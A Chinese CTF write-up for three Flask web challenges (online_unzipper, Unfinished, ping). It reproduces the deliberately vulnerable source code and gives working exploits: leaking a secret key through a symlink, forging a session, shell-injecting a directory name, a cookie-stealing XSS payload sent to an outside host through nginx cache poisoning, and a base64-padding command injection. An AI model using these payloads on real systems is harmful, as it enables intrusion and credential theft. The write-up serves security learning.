online_unzipper
app.py:
import os
import uuid
from flask import Flask, request, redirect, url_for,send_file,render_template, session, send_from_directory, abort, Response
# Flask application object for the unzip service.
app = Flask(__name__)
# Session-signing key: read from FLASK_SECRET_KEY, falling back to "test_key"
# when the variable is not set.
app.secret_key = os.environ.get("FLASK_SECRET_KEY", "test_key")
# Root directory for extracted uploads: ./uploads under the working directory
# at import time; created here if it does not exist yet.
UPLOAD_FOLDER = os.path.join(os.getcwd(), "uploads")
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
# In-memory account store: username -> {"password": ..., "role": ...}.
users = {}
@app.route("/")
def index():
    """Send logged-in visitors to the upload page and everyone else to login."""
    endpoint = "upload" if "username" in session else "login"
    return redirect(url_for(endpoint))
@app.route("/register", methods=["GET", "POST"])
def register():
    """Show the registration form (GET) or create a new account (POST).

    New accounts are stored in the module-level ``users`` dict with the
    password as submitted and the role fixed to "user".
    """
    if request.method != "POST":
        return render_template("register.html")

    username = request.form["username"]
    password = request.form["password"]
    if username in users:
        return "用户名已存在"

    users[username] = {"password": password, "role": "user"}
    return redirect(url_for("login"))
@app.route("/login", methods=["GET", "POST"])
def login():
    """Show the login form (GET) or check credentials and open a session (POST).

    On success the username and the account's role are copied into the
    session, and the client is redirected to the upload page.
    """
    if request.method != "POST":
        return render_template("login.html")

    username = request.form["username"]
    password = request.form["password"]
    account = users.get(username)
    if account is None or account["password"] != password:
        return "用户名或密码错误"

    # The role is stored in the session itself; upload() later reads it from
    # there rather than from the users dict.
    session["username"] = username
    session["role"] = account["role"]
    return redirect(url_for("upload"))
@app.route("/logout")
def logout():
    """Drop everything stored in the session and go back to the login page."""
    session.clear()
    return redirect(url_for("login"))
@app.route("/upload", methods=["GET", "POST"])
def upload():
    """Accept a zip upload, extract it into its own directory and link to it.

    GET renders the upload form. POST saves the uploaded file as
    ``upload.zip`` inside ``UPLOAD_FOLDER/<dirname>``, extracts it there with
    the external ``unzip`` tool, deletes the archive and returns an HTML
    snippet linking to the download listing. Requires a logged-in session.
    """
    if "username" not in session:
        return redirect(url_for("login"))
    if request.method != "POST":
        return render_template("upload.html")

    archive = request.files["file"]
    if not archive:
        return "未选择文件"

    # Only the "admin" role may pick the directory name; everyone else (and an
    # admin who leaves the field empty) gets a random UUID.
    requested = request.form.get("dirname") if session["role"] == "admin" else None
    dirname = requested or str(uuid.uuid4())

    target_dir = os.path.join(UPLOAD_FOLDER, dirname)
    os.makedirs(target_dir, exist_ok=True)
    zip_path = os.path.join(target_dir, "upload.zip")
    archive.save(zip_path)

    try:
        # NOTE(review): both paths are interpolated into a shell command line
        # unquoted, so an admin-supplied dirname reaches the shell verbatim.
        # os.system reports failure through its return value, which is
        # ignored here, so a failed unzip does not reach the except branch.
        os.system(f"unzip -o {zip_path} -d {target_dir}")
    except:
        return "解压失败,请检查文件格式"

    os.remove(zip_path)
    return f"解压完成!<br>下载地址: <a href='{url_for('download', folder=dirname)}'>{request.host_url}download/{dirname}</a>"
@app.route("/download/<folder>")
def download(folder):
    """Render a listing of the entries inside one extracted upload directory.

    Responds with 404 when ``UPLOAD_FOLDER/<folder>`` does not exist.
    """
    directory = os.path.join(UPLOAD_FOLDER, folder)
    if not os.path.exists(directory):
        abort(404)
    return render_template(
        "download.html",
        folder=folder,
        files=os.listdir(directory),
    )
@app.route("/download/<folder>/<filename>")
def download_file(folder, filename):
    """Return one extracted file as an attachment.

    The file is opened in text mode and its whole content is sent back with
    an ``application/octet-stream`` MIME type. A missing file yields 404; any
    other error yields 500 with the exception text in the body.
    """
    file_path = os.path.join(UPLOAD_FOLDER, folder, filename)
    try:
        # NOTE(review): there is no session check on this route, and open()
        # follows symbolic links, so a symlink extracted from an uploaded
        # archive is served as whatever it points to.
        with open(file_path, 'r') as handle:
            body = handle.read()
        disposition = {"Content-Disposition": f"attachment; filename={filename}"}
        return Response(
            body,
            mimetype="application/octet-stream",
            headers=disposition,
        )
    except FileNotFoundError:
        return "File not found", 404
    except Exception as e:
        return f"Error: {str(e)}", 500
# Start the development server on all interfaces when run as a script.
if __name__ == "__main__":
    app.run(host="0.0.0.0")
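注意到 role 为 admin 时 dirname 可控,而 dirname 会被直接拼接进 os.system 执行的 unzip 命令,因此可以通过命令拼接实现 rce。role 保存在 flask session 中,伪造 session 需要先获取 app.secret_key;本题的密钥是从环境变量导入的,可以上传一个包含指向 /proc/self/environ 的软链接的 zip,解压后通过 /download/<folder>/<filename> 读取该软链接,从而获取 /proc/self/environ 的内容: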
FLASK_SECRET_KEY=#mu0cw9F#7bBCoF!
伪造session:
python flask_session_cookie_manager3.py encode -s "#mu0cw9F#7bBCoF!" -t "{'role':'admin','username':'test'}"
session=eyJyb2xlIjoiYWRtaW4iLCJ1c2VybmFtZSI6InRlc3QifQ.aMUi5w.3kOIwdwel1L_sAQZ2loEgjfRIUA
dirname可控实现rce:
dirname=1;cat /flag*.txt > /app/uploads/c048ac00-3ec7-4557-b328-00e50c5ec392/flag.txt
Unfinished
app.py:
from flask import Flask, request, render_template, redirect, url_for, flash, render_template_string, make_response
from flask_login import LoginManager, UserMixin, login_user, logout_user, current_user, login_required
import requests
from markupsafe import escape
from playwright.sync_api import sync_playwright
import os
# Flask application object for the profile/bio service.
app = Flask(__name__)
# NOTE(review): the session-signing key is a hard-coded placeholder string.
app.config['SECRET_KEY'] = 'your-secret-key-here'
# flask-login manager bound to this app.
login_manager = LoginManager()
login_manager.init_app(app)
# Name of the view used as the login page for @login_required routes.
login_manager.login_view = 'login'
class User(UserMixin):
    """In-memory account record used with flask-login.

    Attributes:
        id: Numeric identifier; load_user() matches on its string form.
        username: Login name, also the key in USERS_DB.
        password: Password exactly as submitted at registration.
        bio: Free-form profile text, empty by default.
    """

    def __init__(self, id, username, password, bio=""):
        self.id, self.username = id, username
        self.password, self.bio = password, bio
# Admin password: 12 random bytes rendered as 24 hex characters, generated
# anew each time the module is loaded.
admin_password = os.urandom(12).hex()
# In-memory user table keyed by username, seeded with the admin account (id 1).
USERS_DB = {'admin': User(id=1, username='admin', password=admin_password)}
# Most recently assigned user id; register() increments it before use.
USER_ID_COUNTER = 1
@login_manager.user_loader
def load_user(user_id):
    """Return the user whose id, as a string, equals ``user_id``, else None."""
    matches = (account for account in USERS_DB.values() if str(account.id) == user_id)
    return next(matches, None)
@app.route('/')
def index():
    """Render the landing page."""
    return render_template('index.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
    """Show the registration form (GET) or create and log in a new user (POST).

    A successful registration stores the user in USERS_DB under the next id,
    logs them in, and redirects to the index page with a ``ticket`` cookie
    set to a fixed placeholder value.
    """
    global USER_ID_COUNTER

    if request.method != 'POST':
        return render_template('register.html')

    username = request.form['username']
    if username in USERS_DB:
        flash('Username already exists.')
        return redirect(url_for('register'))

    # The counter is bumped before the password field is read, as in the
    # original flow.
    USER_ID_COUNTER += 1
    account = User(
        id=USER_ID_COUNTER,
        username=username,
        password=request.form['password'],
    )
    USERS_DB[username] = account
    login_user(account)

    response = make_response(redirect(url_for('index')))
    response.set_cookie('ticket', 'your_ticket_value')
    return response
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form, or log the user in when valid credentials are posted.

    A failed POST flashes an error and falls through to re-render the form.
    """
    # NOTE(review): the source's indentation was lost; the failure flash is
    # assumed to belong to the POST branch only.
    if request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        account = USERS_DB.get(username)
        if account and account.password == password:
            login_user(account)
            return redirect(url_for('index'))
        flash('Invalid credentials.')
    return render_template('login.html')
@app.route('/logout')
@login_required
def logout():
    """End the current flask-login session and return to the index page."""
    logout_user()
    return redirect(url_for('index'))
@app.route('/profile', methods=['GET', 'POST'])
@login_required
def profile():
    """Show the profile form (GET) or overwrite the current user's bio (POST).

    The submitted bio is stored as-is and echoed to stdout.
    """
    if request.method != 'POST':
        return render_template('profile.html')

    current_user.bio = request.form['bio']
    print(current_user.bio)
    return redirect(url_for('index'))
@app.route('/ticket', methods=['GET', 'POST'])
def ticket():
    """Show the ticket form (GET) or store the posted value in a cookie (POST).

    The posted ``ticket`` field is written unchanged into the ``ticket``
    cookie on the redirect back to the index page. No login is required.
    """
    if request.method != 'POST':
        return render_template('ticket.html')

    submitted = request.form['ticket']
    response = make_response(redirect(url_for('index')))
    response.set_cookie('ticket', submitted)
    return response
@app.route("/view", methods=["GET"])
@login_required
def view_user():
    """Have the bot visit a user's bio page, then show a confirmation page.

    The ``username`` query parameter selects whose bio the bot opens and
    defaults to the current user's name. The bot visit happens synchronously
    through visit_url() before the response is rendered.

    Original author's note, kept verbatim:
        I found a bug in it.
        Until I fix it, I've banned /api/bio/. Have fun :)
    """
    username = request.args.get("username", default=current_user.username)
    # The username is placed into the URL path without any escaping.
    visit_url(f"http://localhost/api/bio/{username}")
    # Plain (non-f) string: the template has no Python interpolations, and an
    # f-string would collapse Jinja's "{{ ... }}" to single braces. The block
    # tags are written as real "{% ... %}" rather than with "\%", which is an
    # invalid escape sequence and left a literal backslash in the output.
    template = """
{% extends "base.html" %}
{% block title %}success{% endblock %}
{% block content %}
<h1>bot will visit your bio</h1>
<p style="margin-top: 1.5rem;"><a href="{{ url_for('index') }}">Back to Home</a></p>
{% endblock %}
"""
    return render_template_string(template)
@app.route("/api/bio/<string:username>", methods=["GET"])
@login_required
def get_user_bio(username):
    """Return the stored bio of ``username``, but only to that same user.

    Responds 401 when the logged-in user's name differs from ``username`` and
    404 when no such user exists. The bio is returned as the raw response
    body, without escaping.
    """
    if current_user.username != username:
        return "Unauthorized", 401

    account = USERS_DB.get(username)
    if not account:
        return "User not found.", 404
    return account.bio
def visit_url(url):
    """Open ``url`` in a headless Chromium session logged in as admin.

    The browser context is given a ``flag`` cookie for ``localhost`` holding
    the FLAG environment variable (or a placeholder), logs in through the
    login form with the admin password, then loads ``url`` and waits a few
    seconds. Any exception is caught and printed; nothing is returned.
    """
    try:
        flag_value = os.environ.get('FLAG', 'flag{fake}')
        # NOTE(review): the key is spelled 'httponly'; Playwright's cookie
        # field is 'httpOnly' - confirm whether this flag takes effect.
        flag_cookie = {
            'name': 'flag',
            'value': flag_value,
            'domain': 'localhost',
            'path': '/',
            'httponly': True
        }
        with sync_playwright() as p:
            browser = p.chromium.launch(headless=True, args=["--no-sandbox"])
            context = browser.new_context()
            context.add_cookies([flag_cookie])
            page = context.new_page()

            # Log in as admin through the regular login form.
            page.goto("http://localhost/login", timeout=5000)
            page.fill("input[name='username']", "admin")
            page.fill("input[name='password']", admin_password)
            page.click("input[name='submit']")
            page.wait_for_timeout(3000)

            # Visit the requested page and give it time to run.
            page.goto(url, timeout=5000)
            page.wait_for_timeout(5000)
            browser.close()
    except Exception as e:
        print(f"Bot error: {str(e)}")
# Start the development server on all interfaces, port 5000, when run as a script.
if __name__ == "__main__":
    app.run(host='0.0.0.0', port=5000)
实现了一个常规的注册登录修改个人信息的功能,个人信息中可以修改两条内容,一个是ticket,另一个是bio,同时提供了bot访问指定用户bio的功能,第一时间想到XSS带出Cookie,将bio改为XSS语句:
<script>fetch('http://ip:port/steal?flag='+document.cookie)</script>
想要实现XSS还需要解决两个问题,第一个问题/api/bio/<string:username>路由要求只能自己访问自己的bio,第二个问题bot设置Cookie的httpOnly属性为True,正常情况下是无法通过javascript脚本来获取Cookie的
nginx.conf:
user www-data;
worker_processes auto;
pid /var/run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    # Shared cache zone "static_cache" used by the css/js location below.
    proxy_cache_path /var/cache/nginx levels=1:2 keys_zone=static_cache:10m max_size=1g inactive=60m;
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    server {
        listen 80 default_server;
        server_name _;

        # Everything else is proxied to the Flask app.
        location / {
            proxy_pass http://127.0.0.1:5000;
        }

        # Plain prefix location: blocks direct access to the bio API.
        location /api/bio/ {
            return 403;
        }

        # Regex location: any URI ending in .css or .js is proxied and
        # cached for 10 minutes. No proxy_cache_key is set, so the default
        # key applies, and the upstream Vary header is ignored.
        # NOTE(review): regex locations are checked after prefix matching
        # and win over a plain prefix match, so /api/bio/<name>.js is
        # handled here rather than by the 403 block above.
        location ~ \.(css|js)$ {
            proxy_pass http://127.0.0.1:5000;
            proxy_ignore_headers Vary;
            proxy_cache static_cache;
            proxy_cache_valid 200 10m;
        }
    }
}
对于第一个问题,在nginx.conf中甚至直接ban了/api/bio/,但是这里有个nginx的配置问题,正则匹配优先级是高于普通前缀匹配的,因此只要设置用户名为.js/.css后缀,这样就能实现访问自己的bio
要想让bot访问恶意用户的bio,还需要利用到nginx中设置的cache,本题是10min的缓存,并且没有明确设置缓存键proxy_cache_key,使用默认缓存键,例如:
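proxy_cache_key $scheme$proxy_host$request_uri;
# 以请求 http://localhost/api/bio/evil.js 为例,各变量的取值为:
$scheme: http
$proxy_host: 127.0.0.1:5000
$request_uri: /api/bio/evil.js
# 默认缓存键中不包含 Cookie,因此不同用户访问同一 URL 会命中同一份缓存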
通过缓存投毒来绕过current_user.username == username的判断,这样bot就能访问恶意用户的bio,从而解决第一个问题
对于第二个问题,app.py中设置的是httponly,但是正确的设置应该是httpOnly,因此并没有起到预防XSS窃取Cookie的作用
大致的攻击流程:创建.js/.css后缀用户名 -> 设置bio为XSS -> 自己访问恶意bio实现缓存投毒 -> bot访问恶意bio实现XSS窃取Cookie,攻击效果:

参考资料:
https://www.echo.cool/docs/middleware/nginx/nginx-caching-mechanism/nginx-cache-key/
https://playwright.net.cn/python/docs/api/class-browsercontext
ping
app.py:
import base64
import subprocess
import re
import ipaddress
import flask
def run_ping(ip_base64):
    """Validate a base64-encoded IPv4 address and ping it once.

    The value is decoded with Python's ``base64`` module and the result must
    look like a dotted-quad IPv4 address of at most 15 characters. The
    *original* base64 text is then decoded a second time by the shell's
    ``base64 -d`` and passed to ``ping -c 1``.

    NOTE(review): validation runs on Python's decoding while execution uses
    the shell's decoding of the same input; the two decoders are not
    guaranteed to agree on input carrying data after the padding.

    Returns:
        The captured stdout of the command on success, or ``False`` when
        validation fails or the command raises or exits non-zero.
    """
    try:
        decoded_ip = base64.b64decode(ip_base64).decode('utf-8')
        octets = decoded_ip.split('.')
        rejected = (
            not re.match(r'^\d+\.\d+\.\d+\.\d+$', decoded_ip)
            or decoded_ip.count('.') != 3
            or not all(0 <= int(octet) < 256 for octet in octets)
            or not ipaddress.ip_address(decoded_ip)
            or len(decoded_ip) > 15
            # Restrict the raw input to the base64 alphabet so it can be
            # placed inside single quotes in the shell command below.
            or not re.match(r'^[A-Za-z0-9+/=]+$', ip_base64)
        )
        if rejected:
            return False
    except Exception:
        return False

    command = f"""echo "ping -c 1 $(echo '{ip_base64}' | base64 -d)" | sh"""
    try:
        completed = subprocess.run(
            command,
            shell=True,
            check=True,
            capture_output=True,
            text=True
        )
    except Exception:
        return False
    return completed.stdout
# Flask application object for the ping service.
app = flask.Flask(__name__)
@app.route('/ping', methods=['POST'])
def ping():
    """Run run_ping() on the ``ip_base64`` field of the JSON request body.

    Responds 400 with an error when the field is missing or empty, 200 with
    the command output when run_ping() returns a truthy value, and 400 with
    ``success: false`` otherwise.
    """
    payload = flask.request.json
    ip_base64 = payload.get('ip_base64')
    if not ip_base64:
        return flask.jsonify({'error': 'no ip'}), 400

    output = run_ping(ip_base64)
    if not output:
        return flask.jsonify({'success': False}), 400
    return flask.jsonify({'success': True, 'output': output}), 200
@app.route('/')
def index():
    """Render the ping form page."""
    return flask.render_template('index.html')
# Starts the development server on all interfaces, port 5000. There is no
# __main__ guard, so this also runs when the module is imported.
app.run(host='0.0.0.0', port=5000)
实现了 ping ip 的功能,同时对 python base64 解码后的 ip 有严格的过滤,但是在执行命令时用的是 linux 的 base64 命令来解码。二者的实现是有差异的:python 的 base64.b64decode 在默认模式下解码到填充符 = 就结束,不会解析其后的内容;而 linux 的 base64 -d 会把填充符之后拼接的内容继续解码:
import base64
s1 = b"dGVzdA=="
s2 = b"dGVzdA==Y29tbWFuZA=="
print(base64.b64decode(s1)) # b'test'
print(base64.b64decode(s2)) # b'test'
$ echo 'dGVzdA==' | base64 -d
test
$ echo 'dGVzdA==Y29tbWFuZA==' | base64 -d
testcommand
只需要构造一个base64编码后有填充符的ip,后面跟上base64编码的命令就能实现rce:
$ echo -n '8.8.8.8' | base64 | tr -d '\n'; echo -n ';cat /flag' | base64
OC44LjguOA==O2NhdCAvZmxhZw==
payload:
{"ip_base64":"OC44LjguOA==O2NhdCAvZmxhZw=="}
response:
{"output":"PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=128 time=66.5 ms\n\n--- 8.8.8.8 ping statistics ---\n1 packets transmitted, 1 received, 0% packet loss, time 0ms\nrtt min/avg/max/mdev = 66.546/66.546/66.546/0.000 ms\nflag{test}\n","success":true}